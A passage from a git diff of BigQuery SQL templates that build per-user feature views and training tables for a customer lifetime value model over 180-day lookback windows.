geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - -- Gets a row number for each user_pseudo_id ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_90` -) -WHERE - -- Filters only for one row for each user_pseudo_id - user_row_order = 1; - - - 
CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_180` -(processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_inference_180_180", - description="View Purchase Propensity Inference dataset using 30 days back to predict 15 days ahead. 
View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day -FROM ( -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - -- Gets a row number for each user_pseudo_id ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_180` -) -WHERE - -- Filter only for one row for each user_pseudo_id - user_row_order = 1; diff 
--git a/sql/procedure/customer_lifetime_value_training_preparation.sqlx b/sql/procedure/customer_lifetime_value_training_preparation.sqlx index 9780547e..88d9c29f 100644 --- a/sql/procedure/customer_lifetime_value_training_preparation.sqlx +++ b/sql/procedure/customer_lifetime_value_training_preparation.sqlx @@ -560,681 +560,10 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_trai WHERE pltv_revenue_30_days > 0.0 ); --- Prepares the non-duplocated features and labels for the CLTV model looking back 180 days to predict 90 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_90` AS( - SELECT DISTINCT - -- Current timestamp for processing time - CURRENT_TIMESTAMP() AS processed_timestamp, - -- Data split for training and testing - data_split, - -- Feature date for the features - feature_date, - -- User pseudo id for identifying users - user_pseudo_id, - -- Get the latest user id for each user and feature date - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Get the latest device category for each user and feature date - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Get the latest device mobile brand name for each user and feature date - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Get the latest device mobile model name for each user and feature date - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Get the latest device os for each user and feature date - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Get the latest device language for each user and feature date - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Get the latest device web browser for each user and feature date - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Get the latest geo sub continent for each user and feature date - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Get the latest geo country for each user and feature date - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Get the latest geo region for each user and feature date - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Get the latest geo city for each user and feature date - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Get the latest geo metro for each user and feature date - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Get the latest last traffic source medium for each user and feature date - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Get the latest last traffic source name for each user and feature date - LAST_VALUE(last_traffic_source_name) OVER(PARTITION 
BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Get the latest last traffic source source for each user and feature date - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Get the latest first traffic source medium for each user and feature date - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Get the latest first traffic source name for each user and feature date - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Get the latest first traffic source source for each user and feature date - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Get the latest has signed in with user id for each user and feature date - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Get the latest active users past 1-30 day for each user and feature date - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Get the latest active users past 30-60 day for each user and feature date - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Get the latest active users past 60-90 day for each user and feature date - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Get the latest active users past 90-120 day for each user and feature date - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Get the latest active users past 120-150 day for each user and feature date - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Get the latest active users past 150-180 day for each user and feature date - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Get the latest purchases past 1-30 day for each user and feature date - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_30_day, - -- Get the latest purchases past 30-60 day for each user and feature date - LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Get the latest purchases past 60-90 day for each user and feature date - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Get the latest purchases past 90-120 day for each user and feature date - LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Get the latest purchases past 120-150 day for each user and feature date - 
LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Get the latest purchases past 150-180 day for each user and feature date - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Get the latest visits past 1-30 day for each user and feature date - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Get the latest visits past 30-60 day for each user and feature date - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Get the latest visits past 60-90 day for each user and feature date - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Get the latest visits past 90-120 day for each user and feature date - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Get the latest visits past 120-150 day for each user and feature date - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Get the latest visits past 150-180 day for each user and feature date - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Get the latest view items past 1-30 day for each user and feature date - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Get the latest view items past 30-60 day for each user and feature date - LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Get the latest view items past 60-90 day for each user and feature date - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Get the latest view items past 90-120 day for each user and feature date - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Get the latest view items past 120-150 day for each user and feature date - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Get the latest view items past 150-180 day for each user and feature date - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Get the latest add to carts past 1-30 day for each user and feature date - LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Get the latest add to carts past 30-60 day for each user and feature date - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Get the latest add to carts past 60-90 day for each user and feature date - 
LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Get the latest add to carts past 90-120 day for each user and feature date - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Get the latest add to carts past 120-150 day for each user and feature date - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Get the latest add to carts past 150-180 day for each user and feature date - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Get the latest checkouts past 1-30 day for each user and feature date - LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Get the latest checkouts past 30-60 day for each user and feature date - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Get the latest checkouts past 60-90 day for each user and feature date - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Get the latest checkouts past 90-120 day for each user and feature date - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Get the latest checkouts past 120-150 day for each user and feature date - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Get the latest checkouts past 150-180 day for each user and feature date - LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_150_180_day, - -- Get the latest pltv revenue 90 days for each user and feature date - LAST_VALUE(pltv_revenue_90_days) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS pltv_revenue_90_days - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` - -- Filter for users with pltv revenue 90 days greater than 0 - WHERE pltv_revenue_90_days > 0.0 -); - --- Prepares the non-duplocated features and labels for the CLTV model looking back 180 days to predict 180 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_180` AS( - SELECT DISTINCT - -- Captures the current timestamp when the query is executed. - CURRENT_TIMESTAMP() AS processed_timestamp, - -- Represents the data split (e.g., train, validation, test). - data_split, - -- Represents the date for which features are extracted. - feature_date, - -- Represents the unique identifier for a user. - user_pseudo_id, - -- Extracts the latest user ID for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Extracts the latest device category for each user, based on the feature_date, using the LAST_VALUE window function. 
- LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Extracts the latest device brand name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Extracts the latest device model name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Extracts the latest device operating system for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Extracts the latest device language for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Extracts the latest device web browser for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Extracts the latest geographic sub-continent for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Extracts the latest geographic country for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Extracts the latest geographic region for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Extracts the latest geographic city for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Extracts the latest geographic metropolitan area for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Extracts the latest last traffic source medium for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Extracts the latest last traffic source name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Extracts the latest last traffic source for each user, based on the feature_date, using the LAST_VALUE window function. 
- LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Extracts the latest first traffic source medium for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Extracts the latest first traffic source name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Extracts the latest first traffic source for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Extracts the latest user's sign-in status for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Extracts the latest number of active users in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Extracts the latest number of active users in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Extracts the latest number of active users in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Extracts the latest number of active users in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Extracts the latest number of active users in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Extracts the latest number of active users in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Extracts the latest number of purchases in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_30_day, - -- Extracts the latest number of purchases in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. 
- LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Extracts the latest number of purchases in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Extracts the latest number of purchases in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Extracts the latest number of purchases in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Extracts the latest number of purchases in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Extracts the latest number of visits in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Extracts the latest number of visits in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Extracts the latest number of visits in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Extracts the latest number of visits in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Extracts the latest number of visits in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Extracts the latest number of visits in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Extracts the latest number of viewed items in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Extracts the latest number of viewed items in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. 
- LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Extracts the latest number of viewed items in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Extracts the latest number of viewed items in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Extracts the latest number of viewed items in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Extracts the latest number of viewed items in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Extracts the latest number of items added to carts in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Extracts the latest number of items added to carts in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Extracts the latest number of items added to carts in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Extracts the latest number of items added to carts in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Extracts the latest number of items added to carts in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Extracts the latest number of items added to carts in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Extracts the latest number of checkouts in 